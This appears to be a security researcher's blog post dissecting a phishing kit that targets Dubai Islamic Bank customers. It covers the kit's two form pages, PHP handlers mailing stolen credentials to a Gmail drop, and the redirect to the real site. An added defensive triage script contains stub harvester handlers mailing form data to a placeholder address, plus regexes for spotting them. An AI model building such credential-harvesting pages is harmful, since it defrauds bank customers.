Dubai Islamic Bank phishing kit

Another phishing kit has recently emerged from the same actor, “traderpcp”, who appears to specialize in offering web shells, phishing kits, spam lists (also called leads), hacking tools, and cPanel access. The threat actor is very active on a criminal marketplace where he sells his wares.


We discovered a new phishing kit, hosted on a compromised server, that aims to collect the credentials of Dubai Islamic Bank clients. The kit is composed of a few files:

[Screenshot: listing of the files in the kit]

The kit is very simple. The file index.html references logo.png, firstinfo.php, submit.png, and index.png to display the first web page of the phishing kit, as follows:

[Screenshot: first page of the phishing kit]

The file firstinfo.php is responsible for capturing the data and sending it to the criminal:

[Screenshot: source of firstinfo.php]

The PHP script captures the stolen information, sends it to the Gmail address “pakpaki1989@gmail.com”, and then calls the file 2ndpage.html. The file 2ndpage.html is a second web page that asks the victims for additional information, such as phone number, email address, and email password:

[Screenshot: second page of the phishing kit]

As with the first page, the file 2ndpage.html only references a handful of other files; in this case, logo.png, 2ndpage.php, submit.png, and 2ndpage.png:

[Screenshot: source of 2ndpage.html]

The file 2ndpage.php is very similar to the file firstinfo.php.

[Screenshot: source of 2ndpage.php]

It captures the information, sends it to the same Gmail address “pakpaki1989@gmail.com”, and redirects the user to the real website at the URL “https://ebank.dibpak.com/ebank/”. The bank seems to be aware of this type of fraudulent activity. Upon arriving on the site, visitors see a pop-up warning addressed to its clients:

[Screenshot: warning pop-up on the real website]
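
The two-stage flow described above (HTML form, PHP handler, drop address, redirect) can be mapped automatically when triaging files recovered from a compromised server. The following Python is an added example, not code from the kit or from the original post; the sample file contents, the example.com addresses, the function name triage_kit, and the assumption that the handlers use PHP's mail() and a Location header are constructed for illustration.

```python
import re

# Constructed sample modelled on the file layout described above; the
# handler bodies are assumptions (the kit's real sources are not reproduced).
SAMPLE_KIT = {
    "index.html": '<form method="post" action="firstinfo.php"><input name="user"></form>',
    "firstinfo.php": '<?php $to = "drop@example.com"; $m = $_POST["user"];\n'
                     'mail($to, "log", $m); header("Location: 2ndpage.html"); ?>',
    "2ndpage.html": '<form method="post" action="2ndpage.php"><input name="email"></form>',
    "2ndpage.php": '<?php $to = "drop@example.com"; $m = $_POST["email"];\n'
                   'mail($to, "log", $m); header("Location: https://bank.example/login"); ?>',
    "logo.png": "",
}

FORM_ACTION = re.compile(r'<form[^>]*\baction\s*=\s*["\']([^"\']+)', re.I)
EMAIL = re.compile(r'[\w.+-]+@[\w-]+(?:\.[\w-]+)+')
REDIRECT = re.compile(r'header\s*\(\s*["\']Location:\s*([^"\']+)', re.I)
READS_POST = re.compile(r'\$_(?:POST|REQUEST)\b')
CALLS_MAIL = re.compile(r'\bmail\s*\(', re.I)

def triage_kit(files):
    """Map each stage of a kit: form -> handler -> drop address -> next hop."""
    report = {"handlers": {}, "drop_addresses": set(), "final_redirects": set()}
    # Handlers that the HTML pages actually post to.
    posted_to = {a for n, body in files.items() if n.lower().endswith((".html", ".htm"))
                 for a in FORM_ACTION.findall(body)}
    for name, body in files.items():
        if not name.lower().endswith(".php"):
            continue
        # A script that reads request data and also mails it is a harvester.
        harvests = bool(READS_POST.search(body) and CALLS_MAIL.search(body))
        hops = [h.strip() for h in REDIRECT.findall(body)]
        report["handlers"][name] = {
            "form_target": name in posted_to,
            "mails_post_data": harvests,
            "redirects_to": hops,
        }
        if harvests:
            # Addresses in a harvester are candidate drop mailboxes to report.
            report["drop_addresses"].update(EMAIL.findall(body))
            # Absolute redirects usually point at the impersonated brand.
            report["final_redirects"].update(
                h for h in hops if h.startswith(("http://", "https://")))
    return report

if __name__ == "__main__":
    print(triage_kit(SAMPLE_KIT))
```

The drop addresses and final redirect it extracts are the indicators worth passing to the mail provider's abuse desk and to the impersonated institution.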

The threat actor traderpcp appears to be very active on that criminal marketplace, offering his wares for a fair price and demonstrating that they work. He offers phishing kits for three major US banks: USAA, Chase, and Bank of America. He also offers phishing kits for LinkedIn and Apple. Although phishing kits are not a new threat, the fact that the threat actor provides lists of emails to spam, access to a compromised server via a web shell, and the phishing kit itself makes it much easier for criminals to start a phishing campaign targeting these institutions.

PS: Phishing kits can be provided on a case-by-case basis to people we know and trust.
